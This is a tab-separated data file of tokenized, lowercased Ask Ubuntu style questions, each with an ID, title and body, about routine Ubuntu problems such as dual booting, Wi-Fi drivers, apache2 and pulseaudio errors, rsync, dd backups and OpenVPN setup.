338241	how do i install software from the gnome extensions website ?	i have installed gnome addon , but when i go to the gnome shell extensions , i still ca n't find any on/off sliders .
338248	error trying to make usb drive into bootable host drive in virtualbox	i want to install ubuntu as guest os on win7 on virtualbox . when i try to designate my usb drive as the host drive for installation purposes , it gives me this error : result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 29989373-b111-4654-8493-2e1176cba890 } callee : ivirtualbox { 3b2f08eb-b810-4715-bee0-bb06b9880ad2 } callee rc : vbox_e_object_not_found ( 0x80bb0001 ) unetbootin wo n't let me make a cd disc to boot from so i 'm left with my usb drive which has the iso on it . thx in advance for any assistance .
338250	how to use wget to download videos ?	i want to download videos from this link http : //nptel.iitm.ac.in/video.php ? subjectid=106102064 i do n't know how to use wget to download the videos from this site . please help me . thanks .
338253	cheese does not work sometimes	i 'm using 12.04 64 bit and cheese does n't work sometimes . it just opens the main window and that 's all ; webcam is n't working . and the most important of all , this happens sometimes . how can i solve this issue and any ideas about the reason of this situation ? output of uname -a : linux talha-hp 3.2.0-52-generic # 78-ubuntu smp fri jul 26 16:21:44 utc 2013 x86_64 x86_64 x86_64 gnu/linux
338254	lost hdd space at home	i have total 365 gb at /home : and 146 gb is used : so free space must be : 365 - 146 = 219 gb but it is 17.2 gb ! ( see screen2 - it is nautilus directory properties with sudo ) 201.8 gb is `` invisible '' . where are free space ? addition info seems such problem was occured on remmina ( remote desctop client ) runs reebot was help once time . but not for now . baobab on sudo also show 146.1 gb
338256	download svg edit for using it in mediawiki	i am running ubuntu 12.04 server with mediawiki 1.21 ( newest stable ) version on it . now i need this extension svgedit extension , i configurated my localsettings.php and put all required files in the dir extension/svgedit . now i am stuck at this point : configuration , i want to host the svg-editor on my own server and now i need the programm , but i ca n't find the needed one . do i understand it correctly , that i have to install the svgedit then in extensions/svgedit/svg-edit ? any help is upvoted immediately ! thanks in advance .
338260	how can i access missing hard drive partitions ?	i recently installed ubuntu 13.04 alongside windows 8 . i had 4 drives and now i can access only 2 drives . how can i access the other 2 drives from windows 8 ?
338263	update-manager not showing items	my update-manager is n't showing any items to update . it does show the total amount of data to be downloaded . and number of programs to be updated . and when hitting the update button it does update . when i use command promt everything shows up as expected .
338270	gssapi requires ruby version > = 1.9.1. on gem install	i 'm trying to install knife-cloudstack plugin using gem install on ubuntu 12.04 with chef-client configured and got error as said in title . > gem install knife-cloudstack error : error installing knife-cloudstack : gssapi requires ruby version > = 1.9.1 so i tried installing apt-get install ruby1.9.3 , but still the same error . also , the version of ruby is shown 1.9.3 ruby -- version ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ i686-linux ] to get more confused , when i run sudo update-alternatives -- config ruby , its showing output as : there are 2 choices for the alternative ruby ( providing /usr/bin/ruby ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/bin/ruby1.8 50 auto mode 1 /usr/bin/ruby1.8 50 manual mode * 2 /usr/bin/ruby1.9.1 10 manual mode press enter to keep the current choice [ * ] , or type selection number : ps : initially the * was on selection:0 , i changed it later to 2 . now where is ruby1.9.3 ? even if i installed ruby1.9.3 , why its taking other version ? anyone knowing what 's causing the issue ? thanks .
338272	where is my imagemagick installed ?	i tried to locate it with locate imagemagick my result is this : /etc/bash_completion.d/imagemagick /usr/lib/mime/packages/imagemagick /usr/share/doc/imagemagick /usr/share/doc/imagemagick-common /usr/share/doc/imagemagick/news.debian.gz /usr/share/doc/imagemagick/readme.debian /usr/share/doc/imagemagick/readme.txt.gz /usr/share/doc/imagemagick/todo.debian /usr/share/doc/imagemagick/changelog.debian.gz /usr/share/doc/imagemagick/copyright /usr/share/doc/imagemagick-common/news.debian.gz /usr/share/doc/imagemagick-common/changelog.debian.gz /usr/share/doc/imagemagick-common/copyright /usr/share/menu/imagemagick /var/cache/apt/archives/imagemagick-common_8 % 3a6.6.9.7-5ubuntu3.2_all.deb /var/cache/apt/archives/imagemagick_8 % 3a6.6.9.7-5ubuntu3.2_amd64.deb /var/lib/dpkg/info/imagemagick-common.conffiles /var/lib/dpkg/info/imagemagick-common.list /var/lib/dpkg/info/imagemagick-common.md5sums /var/lib/dpkg/info/imagemagick.list /var/lib/dpkg/info/imagemagick.md5sums /var/lib/dpkg/info/imagemagick.postinst /var/lib/dpkg/info/imagemagick.postrm so which is the path of imagemagick now : ( ? i need it to link to it in my mediawiki extension . any help is upvoted fast ! i gues it 's this : /usr/lib/mime/packages/imagemagick but how can i check , or how can i know that ?
338274	apache2 not starting	sudo service apache2 start is not working , i am getting * starting web server apache2 apache2 : syntax error on line 234 of /etc/apache2/apache2.conf : syntax error on line 51 of /etc/apache2/conf.d/eventum-2.2/contrib : include takes one argument , name of the config file to be included action 'start ' failed . if anybody knows then please help me out .
338276	behavior on listview	i need to scroll an element of a listview to bottom when user clicks on it , with an animation . i want to use behavior for the animation , but i do something wrong . i have no problem with the scroll itself : onclicked : { mouse.accepted = false gotoindex ( index ) ; } function gotoindex ( index ) { listview.positionviewatindex ( index , listview.contain ) } but behavior does n't work : listview { id : listview behavior on contenty { numberanimation { duration : 500 } } } what 's wrong ?
338280	can we control a terminal-window size from a '.desktop ' file	the .desktop file opens a python script in the terminal . ( with 'exec ' and terminal = true ) . could any other parameters be included so as to open the gnome-terminal in a specific profile or a particular window size ?
338282	what are the monospace fonts ?	simple question , what are the monospace fonts ? i know that are fixed size fonts and that are used on terminal , but how can i know which are monospace ? and why if i change it i dont see any change on terminal fonts on gnome-shell using tweaktool ?
338283	how to disable module tun on ubuntu 12.04 lts ?	i use ubuntu server 12.04 lts x86_64 . lsmod | grep tun prints no output but modprobe -r tun yields fatal : module tun in builtin how to disable module tun on ubuntu 12.04 lts ?
338289	can i flash ubuntu touch to wiko cink slim	i was wondering if i can flash ubuntu touch on my wiko cink slim android phone . specs : •dual sim/ dual standby •4.0-inch wvga ( 480x800 ) ips display •233ppi with 5-point multi-touch feature •android 4.1 ( jelly bean ) •1ghz dual-core mt6577 processor •powervr sgx531 gpu •512mb of ram •4gb of internal storage ( 2.5gb usable ) •microsd card slot up to 32gb •5mp autofocus camera with led flash •720p hd video recording •vga ( 0.3mp ) front camera •hsdpa 7.2 mbps ; hsupa 5.76 mbps •bluetooth v2.1 with a2dp and edr •wifi 802.11b/g/n , wifi hotspot •gsm triband / 3g dualband •gps with a-gps support •tv-out support / led notification •3.5mm headset jack / microusb •proximity / ambient light / motion sensor •li-ion 1,600mah battery •standby time up to 200 hours •talk time up to 9 hours •127.5 x 65.5 x 10.3mm ( dimension ) •125g ( weight )
338290	cleaning the command line ( like `esc` in windows )	when have the garbage in the command line , i can simply hit escape and it is cleaned . nothing happens in linux . what is the corresponding command ? backspace over the whole string is boring and stupid . i would like to crosspost to both linux and unix forum , since i think this applies to both .
338294	output url of open firefox tabs in terminal	i would like to find out the urls of the currently opened firefox tabs with a terminal command . is there any possibility ? this way i would be able to write them into a text file and look at them lateron ; and safe resources ( i often have many open tabs ) . i know that there is an add-on for firefox , but i would be more confortable writing my own script .
338297	classicmenu indicator revert old icon after update to 0.08	today i 've updated the super-cool classicmenu indicator to it 's latest 0.08 version . however i do n't like the brand new icon at all . how do i revert it to the previous version ? ( the white circle based ubuntu logo )
338299	now that mesa 9.2 stable is a out , is there a way to upgrade to it in ubuntu 13.04 without using unstable ppas ?	i have a notebook with an amd graphics card and i use it for games occasionally . the performance in ubuntu 13.04 using open-source drivers is only ok , but i understand that mesa 9.2 , combined with a new kernel ( i have 3.11rc7 already installed ) should improve performance a lot . i had bad experiences using unstable ppas in the past ( like x-edgers ) so i decided to wait for a stable version of mesa . now that it is out , will it be uploaded to standard ubuntu repositories ? if not , is there a stable mesa ppa or something similar ?
338300	how to backup data from usb drive using dd or dd_rescue in ubuntu	i mistakenly deleted some important zip files from my micro-sd card . i want to do data recovery on my micro-sd card . before doing that i want take image backup of my sd card data , so that i can have backup of my micro-sd card data in case of any crash . from the link askubuntu i came to know that dd_rescue command will do the job . this link gnu ddrescue manual provide few examples for how to do data backup . but i could n't find the exact command to take data backup from sd card to a image file . what command i need to provide to take image backup of my micro-sd card ? thanks for the support
338301	squidguard issue configuring.getting same error over and over again	well , i installed squid3 the other day and then installed quintolabs , but i discovered this program squidguard that looks much easier to work with and configure and it looks like it would serve as a more adequate web filter for my needs . i installed squidguard seemingly without a problem and i am following this tutorial . i am at the part when i just finished installing the blacklist and now i am trying to do a test run of squidguard with output to stderr using the command squidguard -d ( i am a total newbie with linux and am not that familiar with any commands or the file system or anything being used to windows for so long ) . this is what shows in the terminal which includes the error : administrator @ linuxwebfilter : ~ $ squidguard -d squidguard : error while loading shared libraries : libdb-4.8.so : can not open shared object file : no such file or directory i have no idea what to do or how to fix this . can someone please help with this ?
338306	what is the best way installing ubuntu on an 1 ssd + 2 hdd combination ?	i have installed , already , ubuntu ( latest ) on ssd ocz vertex 4 ( everything , home , tmp , / , swap , etc ) . i have two other hdds . one is just windows ( used by my wife , only ) and one is used to just store big media files ( 300gb each ) . someone told me that swap and tmp files will wear out my ssd . is this true ? having this installation , what should i do now , in order to protect my ssd ?
338308	does `` old '' rsh exist in ubuntu ?	i wanted to try out rsh ( or rshell ? ) - the old , insecure way of logging in remotely . on my ubuntu 11.04 , it turns out an rsh command exists : $ which rsh /usr/bin/rsh ... however , it turns out it is a mere symlink for ssh : $ ls -la `which rsh` lrwxrwxrwx 1 root root 21 2011-03-25 16:07 /usr/bin/rsh - > /etc/alternatives/rsh $ ls -la $ ( readlink -f `which rsh` ) -rwxr-xr-x 1 root root 391580 2011-04-02 12:16 /usr/bin/ssh does this `` old '' rsh exist in ubuntu repositories - and if so , how do i install it ? also , is rsh also split in client and server packages - and if so , which packages are those ?
338314	what are differences between restarting apache2 and service apache2 ?	sudo /etc/init.d/apache2 restart and sudo service apache2 restart what are the differences ? thanks
338316	i installed ubuntu 12.4 version both wifi and lan are not working	may laptop is lenovo g580 which is now dual booting windows 7 & ubuntu . in ubuntu , the wifi symbol is present at the top but there 's no list of active wifi networks . i tried lan but its also not detectable . please help me . this is the first time i installed linux .
338326	how to upgrade android on sony xperia tablet z using ubuntu 12.04 ?	my sony xperia tablet z need an android upgrade but i really do n't know how to do it using ubuntu 12.04 .
338327	how can i find out what causes strange behaviour in unity ?	if i have a problem , how can i find it 's cause ? i have a very specific problem , but i 'm also curious to hear general solutions . the problem is : sometimes my maximized windows get an additional unclickable top window border . i found out how can i reproduce this issue : i have to hold ctrl and scroll the mouse wheel down ( for example when i want to zoom in firefox , or gimp ) , and then unity gets buggy ( also the launcher locks , and wo n't hide ) . i do n't want to file a bug until i know what 's happening . so my question is , what are the possibilities to track down the cause of this strange behaviour ? if you can tell the cause of this specific issue , that 's ok , but i 'm searching for a method to find it myself next time .
338328	change font size in xfce terminal using ctrl + mouse wheel ?	in xfce terminal , is it possible to change the font size using ctrl + mouse-wheel as you would do in a browser ?
338331	installing linux and then window	i have windows 8 installed . i want to remove it completely and install linux first . then later i might need to install windows 7 as well . i 'm installing linux from a bootable usb right now . if i choose `` remove windows 8 completely and install linux instead of it '' in a dialog and take all the space of my disk for linux ( ext4 ) , will i be able to `` take a part of it back '' later ( when i want to install windows ) , format it into ntfs and install windows 7 there along with linux ?
338332	mount disc xfs filesystem	how can i mount a disc with a xfs file system ? i 'm using sudo mount /dev/sdc2 /media/mntiomega i receive the error : you must specify the filesystem
338333	rsync creating \ # 015 directory	i have a virtual ubuntu server running on my windows server . this server has 2 external hdd 's attached , which are mounted in ubuntu . now i try to run rsync to sync a directory on my desktop and my windows server . i do this as follows : rsync -av -- update christophe @ begijnhof.no-ip.org : /home/seagate/syncfolder/pictures/ /syncs/pictures the /syncs/pictures is a symlink to /cygdrive/c/../pictures . all these symlinks work correctly , and the remote directory exists too . now when i run that rsync command above it does this : created directory /syncs/pictures\ # 015 this actually creates a directory named `` pictures '' in my /syncs/ folder . so not in the symlink . next to the symlink : $ ls pictures pictures ? when i add a trailing slash to the destination : rsync -av -- update christophe @ begijnhof.no-ip.org : /home/seagate/syncfolder/pictures/ /syncs/pictures/ it creates a directory named `` # 015 '' ( the weird dot ) inside my actual pictures folder on my tower ! i think it has something to do with encoding ? i wrote all the bash scripts in notepad++ with encoding to ansi .
338335	update manager error ( ubuntu 11.10 )	system update marks as an error . while trying to install updates , errors like this occurs : the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.13-20ubuntu5 ) but it is not installed libc6-dev : depends : libc6 ( = 2.13-20ubuntu5.3 ) but 2.13-20ubuntu5 is installed depends : libc-dev-bin ( = 2.13-20ubuntu5.3 ) but 2.13-20ubuntu5.3 is installed any ideas ? p.s - this is my first experience with ubuntu , so be patient : )
338342	when will ubuntu touch be available for xperia tipo release	when will ubuntu touch be available for xperia tipo release ? i am aware that it does not have a 1 ghz processor , but i have successfully overclocked it to over a ghz .
338343	disk quota questions	i have some problem when i 'm trying to allocate disk limit for user in ubuntu desktop 12.04 lts system . i use edquota to specify the amount of disk space for user after edit fstab file . here are some questions i 'm confusing . i have enabled disk quota in the `` / '' inside fstab file . the problem is when i use the command sudo repquota -a , you can see that the block size of my test2 user is 48928 kb let 's compare the total amount of disk space of test2 user by issuing the command sudo du -hc /home/test2 see what ? the du command calculated the whole test2 's home directory only 2mb . so why repquota calculates that much ? 48mb . by the way , how can i config the disk limit for user 's home directory only ? is that useful ? because users only have permission of thier home directory . but i just want to know if it can be done .
338350	too many printers : print dialog lists all auto-discovered printers in university	i 've just upgraded my laptop from 11.10 to 13.04 . previously , i had manually added the four printers i need to know about ( 1 at home , 3 at uni ) . i discovered a really frustrating change : now , when i launch the print dialog , i now see a list of all the hundreds of network printers that exist in my uni . this is not only a problem because of having to scroll around finding what i actually need , but also it becomes really sluggish ( particularly in libreoffice ) presumably updating some info about the list . is there any way i can turn off auto-discovery , and/or change a setting so that auto-discovered printers are n't offered unless i explicitly add them ? ( in preferences- > printers there 's a menu option view- > discovered printers but turning it off does n't seem to do anything , and next time i go into that prefs pane it 's ticked again , so it does n't seem to stick . )
338352	how to move ubuntu from one disk to another while keeping windows ( using clonezilla ? )	my current system drive is shared with windows and is running out of space . i have lots of programs installed and settings made in my ubuntu system so i would really like to not have to re-install and reconfigure everything . the goal is to move all ubuntu programs/settings/documents to a new drive and expanding old partitions to fill the new ( bigger ) drive . keep windows on the old drive make both windows and ubuntu bootable again . how do i do this the easiest way ? is it a stupid idea from the beginning ie . i should not do this , re-install is better ? from what i 've read clonezilla should be able to do the trick ? but how ? are there any pitfalls here that i should be aware of ? df -h /dev/sdc5 33g 31g 503m 99 % / udev 9,9g 4,0k 9,9g 1 % /dev tmpfs 4,0g 964k 4,0g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 9,9g 452k 9,9g 1 % /run/shm tmpfs 9,9g 0 9,9g 0 % /tmpfs /dev/sda3 300g 260g 41g 87 % /media/program /dev/sdb1 230g 190g 41g 83 % /media/dokument sudo fdisk -l /dev/sdc disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 huvuden , 63 sektorer/spår , 14593 cylindrar , totalt 234441648 sektorer enheter = sektorer av 1 · 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes diskidentifierare : 0xa8dc41c2 enhet start början slut block id system /dev/sdc1 * 2048 156403807 78200880 7 hpfs/ntfs/exfat /dev/sdc2 156405758 234440703 39017473 5 utökad /dev/sdc5 156405760 226093055 34843648 83 linux /dev/sdc6 226095104 234440703 4172800 82 linux växling / solaris
338356	unable to use the 13.04 applications after login	installed 13.04 and after login the desktop files are displayed for the home folder . but i am not sure how to run applications moving the muse to the edges shows nothing . i can use ctrl + t and ctrl + q and can press mail and web dedicated buttons from the keyboard but i want to install my previous apps especially gnome , so how can i call up the sotware centre ?
338357	can i make a external hard drive bootable with ubuntu 13.04 ?	can i make a external hard drive bootable with ubuntu 13.04 ? the same way you would with a usb stick . i currently dont have my large memory stick big enough so can i install ubuntu 13.04 on my laptop by using an external hard drive to boot it from the install it the same way you would using a bootable usb stcik ? ?
338359	html5 video glitch	i have enabled the html5 video 's in youtube . whenever i play a video in html5 , i get to see weird horizantal lines : i 'm using the latest google chrome on ubuntu 13.04 . i 've got a nvidia k1000m graphics card with the latest proprietary drivers installed . how do i fix this issue ?
338367	dual boot with windows 8 not showing	trying to install ubuntu 13.04 64 bit with windows 8 64bit .. but its not show win 8 .. just laptop harddisk without any window 's options update .. i have installed windows 8 64bit but when i try to install ubuntu 13.04 64bit using usb .. it dont detect windows 8 and just show me to erase disk to install ubuntu instead of this screen http : //www.simplehelp.net/images/dual_boot_ubuntu_windows8/img10a.jpg
338368	how to add a printer for a program using wine ?	i use one program in wine which needs printer to work with . but currently i do n't have a printer , and installed cups-pdf . when it comes to print the program says you are using a virtual printer , please plug in real printer , and does n't print . tell me please how to make it that ubuntu see the cups-pdf as a real printer ?
338372	how to install openvpn server in ubuntu 12.04 to have pptp access using username and password ?	i am trying to install openvpn server with pptp type enabled , so that only using username/password someone can have my network access . but my openvpn access server is not allowing me to login via the weblink , how can i fix it ? problem : browsing https : //192.168.1.13:943/admin/ permission denied > > you are not authorized to use the admin ui > > you do not have administrative permission retry login installing openvpn as : step 1 : $ apt-get install openvpn openssl $ cp /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/ $ cd /etc/openvpn/ step 2 : $ mkdir keys $ vim vars ( edit the last section ) export key_country= '' be '' export key_province= '' be '' ... . $ source ./vars $ ./clean-all $ ./build-ca $ ./build-key-server server $ ./build-key client $ ./build-dh $ ls 01.pem ca.key demo.csr dh1024.pem index.txt.attr index.txt.old serial.old server.csr 02.pem ca.crt demo.crt demo.key index.txt index.txt.attr.old serial server.crt server.key step 3 : $ vim /etc/openvpn/server.conf dev tun proto tcp port 1194 # annoying files ca /etc/openvpn/keys/ca.crt cert /etc/openvpn/keys/server.crt key /etc/openvpn/keys/server.key dh /etc/openvpn/keys/dh1024.pem # openvpn username ownership user nobody group nogroup # any private subnet not currently in use server 10.44.77.0 255.255.255.0 # do not know what is it for ! ! persist-key persist-tun # status openvpn-status.log verb 3 # act as dhcp router client-to-client push `` dhcp-option domain # # # . # # # . # # # . # # # '' # server public ip or domain name push `` dhcp-option dns 208.67.222.222 '' # primary dns server ( opendns shown ) push `` dhcp-option dns 208.67.220.220 '' # secondary dns server ( opendns shown ) push `` redirect-gateway '' # directs all traffic through your vpn # log-append /var/log/openvpn # comp-lzo step 4 : $ /etc/sysctl.conf net.ipv4.ip_forward = 1 $ /etc/init.d/openvpn restart as we can see it made a new tun0 so my vpn server is running now , thats not enough , i want to manage it more easy way/lazy way so i installed openvpn access server + some tools $ apt-get install gadmin-openvpn-client gadmin-openvpn-server $ google-chrome http : //openvpn.net/index.php/access-server/download-openvpn-as-sw/113.html ? osfamily=ubuntu $ dpkg -i /home/sun/downloads/openvpn-as-1.8.5-ubuntu12.amd_64.deb now after installing this openvpn access server i have a long list as bellow : $ ip addr 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 3 : wlan0 : < broadcast , multicast > mtu 1500 qdisc mq state down qlen 1000 ... 48 : tun0 : < pointopoint , multicast , noarp , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 100 50 : as0t1 : < pointopoint , multicast , noarp , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 200 ... lot more ... now , the main goal was to have that web link accessible but failing with systems username/passwords .
338374	ubuntu dont run after i remove the usb	i have installed ubuntu 12.04 desktop using usb but after restarting its not showing that any other os it just start with windows . even the drive on which i have installed ubuntu cant be seen in windows .
338381	how to prevent usc from opening a terminal when updating the cache ?	is there any way to change/customize , so when you type ( in terminal ) sudo apt-get update that all the information ( including download and install ) is returned in the terminal instead of in a separate window ? what i 'm looking for is the normal way , that ( at least before and in other linux distribution ) shows what needs to update in plain text in the terminal and with a simple y/n prompt . the behavior is this :
338382	pulseaudio not working : `` home directory not accessible : permission denied ''	i use clementine and it started yesterday to refuse to play anything and display an `` access denied '' alert box . same with rhythmbox . after a while , i realized that my sound indication is also greyed and there is no sound card visible in the sound settings . i think that pulseaudio is the culprit but no certitude there ( see the output below ) . i am on 13.04 and something went wrong but i do n't see how to restart it with a clean config or if i need to change anything . lionel @ prime : ~ $ pulseaudio -vvvv i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : this is pulseaudio 3.0 d : [ pulseaudio ] main.c : compilation host : x86_64-pc-linux-gnu d : [ pulseaudio ] main.c : compilation cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -wall -w -wextra -pipe -wno-long-long -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : running on host : linux x86_64 3.8.0-29-generic # 42-ubuntu smp tue aug 13 19:40:39 utc 2013 d : [ pulseaudio ] main.c : found 8 cpus . i : [ pulseaudio ] main.c : page size is 4096 bytes d : [ pulseaudio ] main.c : compiled with valgrind support : no d : [ pulseaudio ] main.c : running in valgrind mode : no d : [ pulseaudio ] main.c : running in vm : no d : [ pulseaudio ] main.c : optimized build : yes d : [ pulseaudio ] main.c : fastpath defined , only fast path asserts disabled . i : [ pulseaudio ] main.c : machine id is 77bf4823eb9fbd64b69d605100000002 . i : [ pulseaudio ] main.c : using runtime directory /run/user/lionel/pulse . e : [ pulseaudio ] core-util.c : home directory not accessible : permission denied the ouput of ls -l /run/user/lionel/ and pulseaudio -- dump-conf lionel @ prime : ~ $ ls -l /run/user/lionel/ total 0 drwx -- -- -- 2 lionel lionel 60 aoรปt 28 15:15 dconf dr-x -- -- -- 2 lionel lionel 0 aoรปt 28 12:30 gvfs drwx -- -- -- 2 lionel lionel 40 aoรปt 28 12:30 gvfs-burn drwx -- -- -- 2 lionel lionel 120 aoรปt 28 12:30 keyring-iiuwph drwx -- -- -- 2 lionel lionel 40 aoรปt 28 15:11 pulse lionel @ prime : ~ $ pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-3.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000
338384	problem with ad-hoc network simulation with different routing protocol using ns2	when using dsr , interface queue type is queue/droptail/priqueue , no . of node 50 ; the segmentation core dumped occured . but when using dsr , interface queue type is cmupriqueue , no.of node 50 , then it simulates sucessfully . when using aodv , interface queue type is cmupriqueue , no . of node 50 ; the segmentation core dumped occured . but when using aodv , interface queue type is queue/droptail/priqueue , no.of node 50 , then it simulates sucessfully . therefore i have code my tcl script to use different interface queque : aodv using queue/droptail/priqueue dsr using cmupriqueue questions : does any body know what is the reason for this ? what is the difference between these two queues ? i apreciate any help in advance .
338387	when i create a new project i can only choose `` other projects '' , `` non-qt project '' and `` import project ''	i have a problem with ubuntu-sdk i installed it following the guide here get-started but then when i start ubuntu-sdk and try tro create a new project i can only choose `` other projects '' , `` non-qt project '' and `` import project '' , but `` projects > ubuntu `` simply does not exist . to install ubuntu sdk i ran the following commands : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa sudo apt-get install qtcreator sudo apt-get install ubuntu-sdk i 'm running ubuntu 13.04 32-bit anyone can help ? thank you . here 's a screen :
338391	unable to establish wi-fi connection on some wireless networks	i 'm unable to connect to only some networks ( password/ssid triple check ) with my default wireless adapter broadcom bcm4313 802.11b/g/n ( using proprietary driver broadcom sta ) while running ubuntu 12.04 . in the general case i 'm able to connect succesfully to any network . however , there are at least two wireless networks i ca n't connect to : i never had any problem to connect to them before i changed the configuration ( wpa2 instead of wep or nothing , ssid change/hide ) now , when i try to connect i 'm able to enter the ssid and password but the connection never establishes* *i got the little connection animation in the status bar for ~3-5min then ubuntu prompts me for the password , tries to connect for ~3-5min , etc . using an ethernet wired connection , an usb manufacturer realtek rtl8191s wlan adapter , or booting on windows and using the default adapter in those networks do not cause any problem . edit i just upgraded to ubuntu 13.04 , problem persists . lspci -nn -d 14e4 : outputs 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) ( i ca n't find the drivers options in 13.04 )
338392	disable keyboard backlight on sony vaio s series ( 2012 ) ( ubuntu 13.04 )	basically i 'd like to disable the keyboard backlight which at the moment is always on , on my sony vaio s15 ( 2012 series ) . i 've read a few responses in the past which want me to look for the following file : /sys/devices/platform/sony-laptop/kbd_backlight , however in my case this file just does n't exist . please tell me how do i go about it . thanks a ton in advance ! edit : i found a site listing the solution although i do n't really understand what to do ( being a linux newbie : c ) http : //oldpapyrus.wordpress.com/2013/05/29/disable-keyboard-backlight-on-vaio-svs13112enb/ edit2 : just tried the above solution , though it does n't seem to work . please help ! bump . please reply guys . it has already been a week now .
338396	how to open webapps in their own window , without navigation bar	i would like to open firefox webapps ( unity webapps ) in their own windows . without a navigation bar , etc . same as chrome 's `` application shortcuts '' . is there an extension , add-on or app to manage this ?
338397	how to install ubuntu without losing data ?	currently i have ubuntu 13.04 64bit installed on my 320gb partition . all of my work , music and videos are stored in the video and music folders . is there any way to reinstall ubuntu 13.04 again without losing my data ?
338404	booting from usb in uefi	i installed ubuntu 13.10 in dualboot with windows 8 on my uefi system . after that there was no boot option for the usb in the system setup anymore , which was there before under the title 'uefi 8.0x ' . how can i now boot from my usb ?
338416	how to power save and lookup power usage in terminal	i have already installed powertop , pm-utils , laptop-mode-tool , jupitor , also power save with jupitor , cpu-frequency skilling powersave , pm-powersave true but power usage are 1 hour and 20 minutes on 50 percentage of battery , at least 130 minutes in window seven . ubuntu 12.04.3 kernel 3.8 , lenovo z400 , ivy i5-3230 m , nvidia 740m with intel 4000 .
338419	installing windows 7 on a new ubuntu computer	i just received a new alienware computer with ubuntu pre-installed , since updated to version 12.04 . i would like to install windows 7 or 8 ( i have installation discs for both ) to run some programs . any advice for a ubuntu novice on how to do this ? thanks !
338421	ubuntu 12.10 ca n't see eth0 after update from 12.04	i just updated my laptop from ubuntu 12.04 to 12.10 . after the update i could no longer get to the login screen , and after a while i realized that during the update my nvidia-drivers had been uninstalled . apparently no other graphics driver is available . so i started a root prompt to install nvidia-current only to find out that my internet connection is gone . i did the whole update with an ethernet cable plugged in , so it obviously worked in 12.04 . i tried to run /etc/init.d/networking start and service networking start to no avail . ifconfig -a only shows the lo interface ( local loopback ) . lspci lists my ethernet controller : 04:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) i found some resources on the net suggesting i add auto eth0 iface eth0 inet dhcp to /run/network/interfaces ( which did n't exist ) , so i did that and retried service networking start . however , it still does n't work . how do i make ubuntu 12.10 recognize the ethernet connection ? edit : i just ran lshw -c network which lists both my ethernet and wireless as unclaimed . i heard this means there are no drivers available . i have a usb-drive with 12.04 on it , can i somehow extract the correct driver from there and install it ?
338424	citrix receiver stops responding and appears visually out of sync	i 'm using compiz and ubuntu 12.04 64-bit . i use the rotating cube desktop . i often run lync over citrix receiver from a remote server.rotating desktops often causes lync to have lots of problems . sometimes , the lync client seems to move relative to the local viewport , sometimes the local viewport shows a minimized-without-a-taskbar version of the program , and just today , the program stopped responding , and eventually stopped playing audio from the conference i was in . let me know if you have any suggestions ! !
338425	wifi is disabled at every startup	i have updated my ubuntu os with kernel 3.9 from ubuntu main line kernel ppa..the problem i am facing now is , my wifi is disabled at every startup . however i can enable my wifi by using rfkill unblock all .i have searched a lot but can not find solution.i am using intel iwl-wifi driver . thank you .
